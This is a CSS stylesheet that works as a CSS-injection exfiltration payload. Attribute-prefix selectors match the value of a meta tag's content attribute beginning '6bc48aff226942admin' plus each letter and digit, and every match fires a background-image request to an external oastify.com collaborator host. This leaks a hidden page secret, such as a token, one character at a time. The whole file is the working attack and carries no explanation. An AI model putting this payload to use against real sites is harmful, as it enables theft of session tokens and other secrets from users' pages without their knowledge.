meta, head {
 display: block;   
}
meta[content^="6bc48aff226942admina"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admina");}
meta[content^="6bc48aff226942adminb"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminb");}
meta[content^="6bc48aff226942adminc"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminc");}
meta[content^="6bc48aff226942admind"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admind");}
meta[content^="6bc48aff226942admine"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admine");}
meta[content^="6bc48aff226942adminf"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminf");}
meta[content^="6bc48aff226942adming"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adming");}
meta[content^="6bc48aff226942adminh"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminh");}
meta[content^="6bc48aff226942admini"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admini");}
meta[content^="6bc48aff226942adminj"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminj");}
meta[content^="6bc48aff226942admink"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admink");}
meta[content^="6bc48aff226942adminl"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminl");}
meta[content^="6bc48aff226942adminm"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminm");}
meta[content^="6bc48aff226942adminn"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminn");}
meta[content^="6bc48aff226942admino"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admino");}
meta[content^="6bc48aff226942adminp"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminp");}
meta[content^="6bc48aff226942adminq"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminq");}
meta[content^="6bc48aff226942adminr"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminr");}
meta[content^="6bc48aff226942admins"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admins");}
meta[content^="6bc48aff226942admint"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admint");}
meta[content^="6bc48aff226942adminu"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminu");}
meta[content^="6bc48aff226942adminv"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminv");}
meta[content^="6bc48aff226942adminw"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminw");}
meta[content^="6bc48aff226942adminx"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminx");}
meta[content^="6bc48aff226942adminy"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminy");}
meta[content^="6bc48aff226942adminz"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adminz");}
meta[content^="6bc48aff226942admin0"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin0");}
meta[content^="6bc48aff226942admin1"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin1");}
meta[content^="6bc48aff226942admin2"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin2");}
meta[content^="6bc48aff226942admin3"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin3");}
meta[content^="6bc48aff226942admin4"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin4");}
meta[content^="6bc48aff226942admin5"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin5");}
meta[content^="6bc48aff226942admin6"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin6");}
meta[content^="6bc48aff226942admin7"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin7");}
meta[content^="6bc48aff226942admin8"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin8");}
meta[content^="6bc48aff226942admin9"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942admin9");}
